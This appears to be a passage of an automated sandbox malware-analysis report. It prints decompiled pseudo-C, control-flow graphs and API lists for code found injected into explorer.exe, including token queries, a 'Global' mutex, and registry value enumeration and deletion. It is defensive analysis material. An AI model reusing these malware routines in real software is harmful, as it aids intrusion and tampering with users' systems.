                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                                                              • String ID: Research$Z
                                                                                                                                                                                              • API String ID: 1659193697-3866491824
                                                                                                                                                                                              • Opcode ID: 65c397d81b8c2f7bc64dde3761e1d522fb3cb7c842d20b3da7b8f7dbd677d3fc
                                                                                                                                                                                              • Instruction ID: 4b301d323cab039b400196383f57d4f6d6606ed819e2f2d64336a3ed283adb5a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 65c397d81b8c2f7bc64dde3761e1d522fb3cb7c842d20b3da7b8f7dbd677d3fc
                                                                                                                                                                                              • Instruction Fuzzy Hash: E331F935F0424DAFCF14DFAC84401AEFBA6BF893D0B584469EA51D7381D630ED418790
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8C7F5 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 152 2f8c7f5-2f8c815 GetTokenInformation 153 2f8c85b 152->153 154 2f8c817-2f8c820 GetLastError 152->154 155 2f8c85d-2f8c861 153->155 154->153 156 2f8c822-2f8c832 call 2f88bde 154->156 159 2f8c838-2f8c84b GetTokenInformation 156->159 160 2f8c834-2f8c836 156->160 159->153 161 2f8c84d-2f8c859 call 2f88bf4 159->161 160->155 161->160
                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                              			E02F8C7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E02F88BDE(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E02F88BF4( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                                                                                                                                                                                              0x02f8c7f8
                                                                                                                                                                                              0x02f8c7f9
                                                                                                                                                                                              0x02f8c800
                                                                                                                                                                                              0x02f8c808
                                                                                                                                                                                              0x02f8c80c
                                                                                                                                                                                              0x02f8c815
                                                                                                                                                                                              0x02f8c85b
                                                                                                                                                                                              0x02f8c85b
                                                                                                                                                                                              0x02f8c822
                                                                                                                                                                                              0x02f8c82a
                                                                                                                                                                                              0x02f8c82c
                                                                                                                                                                                              0x02f8c832
                                                                                                                                                                                              0x02f8c84b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8c84d
                                                                                                                                                                                              0x02f8c852
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8c858
                                                                                                                                                                                              0x02f8c834
                                                                                                                                                                                              0x02f8c834
                                                                                                                                                                                              0x02f8c834
                                                                                                                                                                                              0x02f8c834
                                                                                                                                                                                              0x02f8c832
                                                                                                                                                                                              0x02f8c861

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,02F80000,00000000,00000000,?,02F8C876,00000000,00000000,?,02F8C89F), ref: 02F8C810
                                                                                                                                                                                              • GetLastError.KERNEL32(?,02F8C876,00000000,00000000,?,02F8C89F,00001644,?,02F8DFCE), ref: 02F8C817
                                                                                                                                                                                                • Part of subcall function 02F88BDE: RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,02F8C876,00000000,00000000,?,02F8C89F,00001644,?,02F8DFCE), ref: 02F8C846
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2499131667-0
                                                                                                                                                                                              • Opcode ID: b7e4aa6500a6e54e6a7a1fc39fc2e2e8052edd6ec802389a1d38d84bf50b27f0
                                                                                                                                                                                              • Instruction ID: bd84f31f89ba2e28f0589e594c64090a76bcdd9adf59abd19e179de5de8b77a3
                                                                                                                                                                                              • Opcode Fuzzy Hash: b7e4aa6500a6e54e6a7a1fc39fc2e2e8052edd6ec802389a1d38d84bf50b27f0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E016772A40118BF9B246BA5DC49DABBFACEE456E0711056AF605E2110D770D900CBF0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F85ED4 Relevance: 4.5, APIs: 3, Instructions: 45synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 164 2f85ed4-2f8b0ec 166 2f8b0ee-2f8b0f1 164->166 167 2f8b0f3-2f8b108 CreateMutexA 164->167 168 2f8b146-2f8b148 166->168 169 2f8b10a-2f8b113 GetLastError 167->169 170 2f8b115-2f8b120 GetLastError 167->170 171 2f8b145 169->171 172 2f8b13d-2f8b143 170->172 173 2f8b122-2f8b12e call 2f8b149 170->173 171->168 172->171 173->172 176 2f8b130-2f8b13b 173->176 176->171
                                                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                                                              			E02F85ED4(signed int __eax, CHAR* __ecx, void* __edx) {
				intOrPtr* _v0;
				signed int _t9;
				intOrPtr _t11;
				void* _t20;
				void* _t23;

				_pop(_t25);
				_t20 = __edx;
				if(__ecx != 0) {
					_t23 = CreateMutexA(0, 1, __ecx);
					if(_t23 != 0) {
						if(GetLastError() != 0xb7 || E02F8B149(_t23, _t20) != 0xffffffff) {
							_t9 = 1;
							 *_v0 = _t23;
						} else {
							_t11 =  *0x2f9f818; // 0x508f6c8
							 *((intOrPtr*)(_t11 + 0x30))(_t23);
							_t9 = 0;
						}
					} else {
						_t9 = GetLastError() | 0xffffffff;
					}
				} else {
					_t9 = __eax | 0xffffffff;
				}
				return _t9;
			}








                                                                                                                                                                                              0x02f85ed7
                                                                                                                                                                                              0x02f8b0e8
                                                                                                                                                                                              0x02f8b0ec
                                                                                                                                                                                              0x02f8b104
                                                                                                                                                                                              0x02f8b108
                                                                                                                                                                                              0x02f8b120
                                                                                                                                                                                              0x02f8b142
                                                                                                                                                                                              0x02f8b143
                                                                                                                                                                                              0x02f8b130
                                                                                                                                                                                              0x02f8b130
                                                                                                                                                                                              0x02f8b136
                                                                                                                                                                                              0x02f8b139
                                                                                                                                                                                              0x02f8b139
                                                                                                                                                                                              0x02f8b10a
                                                                                                                                                                                              0x02f8b110
                                                                                                                                                                                              0x02f8b110
                                                                                                                                                                                              0x02f8b0ee
                                                                                                                                                                                              0x02f8b0ee
                                                                                                                                                                                              0x02f8b0ee
                                                                                                                                                                                              0x02f8b148

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,02F85F36,?,Global,02F9CA40,?,00000000,?,00000001), ref: 02F8B0FE
                                                                                                                                                                                              • GetLastError.KERNEL32(?,02F85F36,?,Global,02F9CA40,?,00000000,?,00000001), ref: 02F8B10A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateErrorLastMutex
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1925916568-0
                                                                                                                                                                                              • Opcode ID: 0c87bff90b18ad127b8e84d195415fa27de459d6fdaa759516e40139c05a34b3
                                                                                                                                                                                              • Instruction ID: ed9cacf380389b7b96f722aa9eb35a1dc98dbe5a12610f33967e3db9c7e7b3d3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c87bff90b18ad127b8e84d195415fa27de459d6fdaa759516e40139c05a34b3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AF0F432B409049BE6202779D806B79F699EF456FEF100769F739CE1D0DB6094028391
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F85EDD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                              			E02F85EDD(void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v52;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t27;
				void* _t42;

				_t42 = __edx;
				_v8 = 0;
				E02F8B557( &_v52, __ecx, __eflags);
				_t16 =  *0x2f9f81c; // 0x2fb0000
				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
					L1:
					_t27 =  *0x2f9f818; // 0x508f6c8
					 *((intOrPtr*)(_t27 + 0xc0))(0x32);
					goto L1;
				}
				_push(0);
				_push( &_v52);
				_push("\\");
				_v12 = E02F89A07("Global");
				_push( &_v8);
				_t19 = E02F85ED4(_t18, _t18, _t42); // executed
				__eflags = _t19 - 1;
				if(_t19 == 1) {
					FindCloseChangeNotification(_v8);
					_v8 = 0;
					_push( &_v8);
					E02F85ED4( &_v8,  &_v52, _t42); // executed
				}
				E02F88BF4( &_v12, 0xffffffff);
				return _v8;
			}










                                                                                                                                                                                              0x02f85ee5
                                                                                                                                                                                              0x02f85eeb
                                                                                                                                                                                              0x02f85ef1
                                                                                                                                                                                              0x02f85ef6
                                                                                                                                                                                              0x02f85f01
                                                                                                                                                                                              0x02f85f03
                                                                                                                                                                                              0x02f85f03
                                                                                                                                                                                              0x02f85f0a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f85f0a
                                                                                                                                                                                              0x02f85f12
                                                                                                                                                                                              0x02f85f16
                                                                                                                                                                                              0x02f85f17
                                                                                                                                                                                              0x02f85f29
                                                                                                                                                                                              0x02f85f2c
                                                                                                                                                                                              0x02f85f31
                                                                                                                                                                                              0x02f85f39
                                                                                                                                                                                              0x02f85f3c
                                                                                                                                                                                              0x02f85f46
                                                                                                                                                                                              0x02f85f4c
                                                                                                                                                                                              0x02f85f4f
                                                                                                                                                                                              0x02f85f55
                                                                                                                                                                                              0x02f85f5a
                                                                                                                                                                                              0x02f85f61
                                                                                                                                                                                              0x02f85f6e

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,00000001), ref: 02F85F46
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                              • String ID: Global
                                                                                                                                                                                              • API String ID: 2591292051-4020866741
                                                                                                                                                                                              • Opcode ID: c16f0e239285a56cb3c049092d4e56b4427166f050b8979cfee4c805c61ac452
                                                                                                                                                                                              • Instruction ID: e9100cb0e46728906d7a37040300befbc1d45da902ecff680ba267d2a46c9dd0
                                                                                                                                                                                              • Opcode Fuzzy Hash: c16f0e239285a56cb3c049092d4e56b4427166f050b8979cfee4c805c61ac452
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F117C76E04108EBDB14EB99EC45DEDB7F9EB84390B61416AE606E7290DA309A01CB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F866C7 Relevance: 3.1, APIs: 2, Instructions: 145registryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 194 2f866c7-2f8670c memset call 2f88bde 197 2f86712-2f86724 call 2f88bde 194->197 198 2f86876-2f8687c 194->198 197->198 201 2f8672a-2f86747 RegOpenKeyExW 197->201 202 2f8674d-2f86780 201->202 203 2f86846-2f8684a 201->203 209 2f86792-2f86797 202->209 210 2f86782-2f8678d 202->210 204 2f8684c-2f86851 203->204 205 2f86857-2f86873 call 2f88bf4 * 2 203->205 204->205 205->198 209->203 211 2f8679d 209->211 210->203 215 2f867a0-2f867ef call 2f88d6d * 2 211->215 221 2f86839-2f86840 215->221 222 2f867f1-2f86801 215->222 221->203 221->215 224 2f86803-2f86817 222->224 225 2f86836 222->225 224->225 227 2f86819-2f86826 call 2f8a456 224->227 225->221 230 2f86828-2f8682a 227->230 231 2f8682f-2f86831 call 2f8bfdb 227->231 230->231 231->225
                                                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                                                              			E02F866C7(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				intOrPtr _t63;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				char _t97;
				short* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t98 = E02F88BDE(0x3fff);
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E02F88BDE(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						_t63 =  *0x2f9f820; // 0x508f8b8
						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
					}
					E02F88BF4( &_v32, 0x3fff);
					E02F88BF4( &_v36, 0x800);
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0x2f9f820; // 0x508f8b8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						E02F88D6D(_t97, 0, 0x800);
						E02F88D6D(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0x2f9f820; // 0x508f8b8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0x2f9f824; // 0x508f990
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0x2f9f820; // 0x508f8b8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E02F8A456(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E02F8BFDB(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0x2f9f820; // 0x508f8b8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}
































                                                                                                                                                                                              0x02f866c7
                                                                                                                                                                                              0x02f866c7
                                                                                                                                                                                              0x02f866d3
                                                                                                                                                                                              0x02f866e2
                                                                                                                                                                                              0x02f866e5
                                                                                                                                                                                              0x02f866ef
                                                                                                                                                                                              0x02f866f7
                                                                                                                                                                                              0x02f866fa
                                                                                                                                                                                              0x02f86702
                                                                                                                                                                                              0x02f86704
                                                                                                                                                                                              0x02f86707
                                                                                                                                                                                              0x02f8670c
                                                                                                                                                                                              0x02f86878
                                                                                                                                                                                              0x02f8687c
                                                                                                                                                                                              0x02f8687c
                                                                                                                                                                                              0x02f8671c
                                                                                                                                                                                              0x02f8671e
                                                                                                                                                                                              0x02f86724
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f86747
                                                                                                                                                                                              0x02f86846
                                                                                                                                                                                              0x02f8684a
                                                                                                                                                                                              0x02f8684c
                                                                                                                                                                                              0x02f86854
                                                                                                                                                                                              0x02f86854
                                                                                                                                                                                              0x02f86860
                                                                                                                                                                                              0x02f8686e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f86873
                                                                                                                                                                                              0x02f86750
                                                                                                                                                                                              0x02f86754
                                                                                                                                                                                              0x02f86758
                                                                                                                                                                                              0x02f8675c
                                                                                                                                                                                              0x02f86760
                                                                                                                                                                                              0x02f86761
                                                                                                                                                                                              0x02f86762
                                                                                                                                                                                              0x02f86763
                                                                                                                                                                                              0x02f86764
                                                                                                                                                                                              0x02f86768
                                                                                                                                                                                              0x02f8676f
                                                                                                                                                                                              0x02f86770
                                                                                                                                                                                              0x02f86775
                                                                                                                                                                                              0x02f86780
                                                                                                                                                                                              0x02f86795
                                                                                                                                                                                              0x02f86797
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8679d
                                                                                                                                                                                              0x02f867a0
                                                                                                                                                                                              0x02f867a8
                                                                                                                                                                                              0x02f867b5
                                                                                                                                                                                              0x02f867ba
                                                                                                                                                                                              0x02f867bd
                                                                                                                                                                                              0x02f867c6
                                                                                                                                                                                              0x02f867cd
                                                                                                                                                                                              0x02f867dd
                                                                                                                                                                                              0x02f867e7
                                                                                                                                                                                              0x02f867ed
                                                                                                                                                                                              0x02f867ef
                                                                                                                                                                                              0x02f867f4
                                                                                                                                                                                              0x02f867fd
                                                                                                                                                                                              0x02f867ff
                                                                                                                                                                                              0x02f86801
                                                                                                                                                                                              0x02f86803
                                                                                                                                                                                              0x02f8680d
                                                                                                                                                                                              0x02f86813
                                                                                                                                                                                              0x02f86817
                                                                                                                                                                                              0x02f8681b
                                                                                                                                                                                              0x02f86820
                                                                                                                                                                                              0x02f86826
                                                                                                                                                                                              0x02f86828
                                                                                                                                                                                              0x02f8682a
                                                                                                                                                                                              0x02f8682a
                                                                                                                                                                                              0x02f86831
                                                                                                                                                                                              0x02f86831
                                                                                                                                                                                              0x02f86817
                                                                                                                                                                                              0x02f86836
                                                                                                                                                                                              0x02f86836
                                                                                                                                                                                              0x02f86839
                                                                                                                                                                                              0x02f8683a
                                                                                                                                                                                              0x02f8683d
                                                                                                                                                                                              0x02f8683d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f867a0
                                                                                                                                                                                              0x02f86782
                                                                                                                                                                                              0x02f8678a
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.MSVCRT ref: 02F866E5
                                                                                                                                                                                                • Part of subcall function 02F88BDE: RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,0002001F,?,?,?,00000001), ref: 02F8673F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeapOpenmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3010731174-0
                                                                                                                                                                                              • Opcode ID: dd83b9f03be13260042776a8fe2aec1e691af2c27c2b1ce52739da70ed28c2a3
                                                                                                                                                                                              • Instruction ID: e0f32956b6453bb824c4c1a60ba05aebca174796f02a459b414c29cacb7b5b3a
                                                                                                                                                                                              • Opcode Fuzzy Hash: dd83b9f03be13260042776a8fe2aec1e691af2c27c2b1ce52739da70ed28c2a3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D512771E0020DAFDB51EFA4CD85FEEBBBDAF08384F144469E605E6141EB359A448FA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8DD81 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F8DD81(void* __ecx) {
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t28;
				void* _t32;
				struct _OSVERSIONINFOA* _t33;

				_t12 =  *0x2f9f818; // 0x508f6c8
				_t33 =  *0x2f9f81c; // 0x2fb0000
				_t14 = E02F8C879( *((intOrPtr*)(_t12 + 0x12c))(_t28, _t32, __ecx)); // executed
				 *((intOrPtr*)(_t33 + 0x110)) = _t14;
				_t3 = _t33 + 0x1644; // 0x2fb1644
				_t29 = _t3;
				_t15 =  *0x2f9f818; // 0x508f6c8
				_t16 =  *((intOrPtr*)(_t15 + 0x128))(0, _t3, 0x105);
				_t37 = _t16;
				if(_t16 != 0) {
					_t16 = E02F895F3(_t29, _t37);
				}
				_t5 = _t33 + 0x228; // 0x2fb0228
				 *((intOrPtr*)(_t33 + 0x1854)) = _t16;
				 *((intOrPtr*)(_t33 + 0x434)) = E02F895F3(_t5, _t37);
				E02F88D6D(_t33, 0, 0x9c);
				_t33->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t33);
				 *((intOrPtr*)(_t33 + 0x1640)) = GetCurrentProcessId();
				_t21 = E02F8F368(_t5);
				_t9 = _t33 + 0x220; // 0x2fb0220
				 *((intOrPtr*)(_t33 + 0x21c)) = _t21;
				_t22 = E02F8F3A3(_t9); // executed
				 *((intOrPtr*)(_t33 + 0x218)) = _t22;
				return _t22;
			}












                                                                                                                                                                                              0x02f8dd85
                                                                                                                                                                                              0x02f8dd8b
                                                                                                                                                                                              0x02f8dd9a
                                                                                                                                                                                              0x02f8dda4
                                                                                                                                                                                              0x02f8ddaa
                                                                                                                                                                                              0x02f8ddaa
                                                                                                                                                                                              0x02f8ddb0
                                                                                                                                                                                              0x02f8ddb8
                                                                                                                                                                                              0x02f8ddbe
                                                                                                                                                                                              0x02f8ddc0
                                                                                                                                                                                              0x02f8ddc4
                                                                                                                                                                                              0x02f8ddc4
                                                                                                                                                                                              0x02f8ddc9
                                                                                                                                                                                              0x02f8ddcf
                                                                                                                                                                                              0x02f8dddf
                                                                                                                                                                                              0x02f8dde9
                                                                                                                                                                                              0x02f8ddf1
                                                                                                                                                                                              0x02f8ddf4
                                                                                                                                                                                              0x02f8de00
                                                                                                                                                                                              0x02f8de06
                                                                                                                                                                                              0x02f8de0b
                                                                                                                                                                                              0x02f8de11
                                                                                                                                                                                              0x02f8de17
                                                                                                                                                                                              0x02f8de1d
                                                                                                                                                                                              0x02f8de25

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetVersionExA.KERNEL32(02FB0000,02FB0000,?,02F83B9C), ref: 02F8DDF4
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,02F83B9C), ref: 02F8DDFA
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CurrentProcessVersion
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2809935031-0
                                                                                                                                                                                              • Opcode ID: 61bf9feea105d48ae5aebfccdfe233a02dab69b8faf2bf1a71d62ce2c4817070
                                                                                                                                                                                              • Instruction ID: 669f71e8179bd9784873d73b5b4cf31eb0a7573da67f4067bd0bf8ac5985b5ad
                                                                                                                                                                                              • Opcode Fuzzy Hash: 61bf9feea105d48ae5aebfccdfe233a02dab69b8faf2bf1a71d62ce2c4817070
                                                                                                                                                                                              • Instruction Fuzzy Hash: AD016D71E407049BD720AF71A849EDAB7E5EF89390F04092DE69687240EF746541CF90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8F05C Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 249 2f8f05c-2f8f07c call 2f89dd8 252 2f8f07e-2f8f084 GetModuleHandleA 249->252 253 2f8f086-2f8f08b LoadLibraryA 249->253 254 2f8f08d-2f8f08f 252->254 253->254 255 2f8f09e-2f8f0ac call 2f88b9c 254->255 256 2f8f091-2f8f096 call 2f8f011 254->256 259 2f8f09b-2f8f09c 256->259 259->255
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E02F8F05C(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E02F89DD8(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xf43) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E02F8F011(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E02F88B9C( &_v8);
				return _t25;
			}










                                                                                                                                                                                              0x02f8f05f
                                                                                                                                                                                              0x02f8f062
                                                                                                                                                                                              0x02f8f068
                                                                                                                                                                                              0x02f8f06a
                                                                                                                                                                                              0x02f8f06f
                                                                                                                                                                                              0x02f8f071
                                                                                                                                                                                              0x02f8f07b
                                                                                                                                                                                              0x02f8f07c
                                                                                                                                                                                              0x02f8f08b
                                                                                                                                                                                              0x02f8f07e
                                                                                                                                                                                              0x02f8f07e
                                                                                                                                                                                              0x02f8f07e
                                                                                                                                                                                              0x02f8f08f
                                                                                                                                                                                              0x02f8f096
                                                                                                                                                                                              0x02f8f09c
                                                                                                                                                                                              0x02f8f09c
                                                                                                                                                                                              0x02f8f0a1
                                                                                                                                                                                              0x02f8f0ac

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,?,?,02F9CA50,?,02F8652B,?), ref: 02F8F07E
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(00000000,?,?,?,02F9CA50,?,02F8652B,?), ref: 02F8F08B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4133054770-0
                                                                                                                                                                                              • Opcode ID: 2eddaa3b128a40b1e274007289c865b4af56ee60a4203d361925b82a4c1a17eb
                                                                                                                                                                                              • Instruction ID: 851a33f336c166b6c1dbd409c55ac69c6159882ed2169d64bf2fb1d491951c81
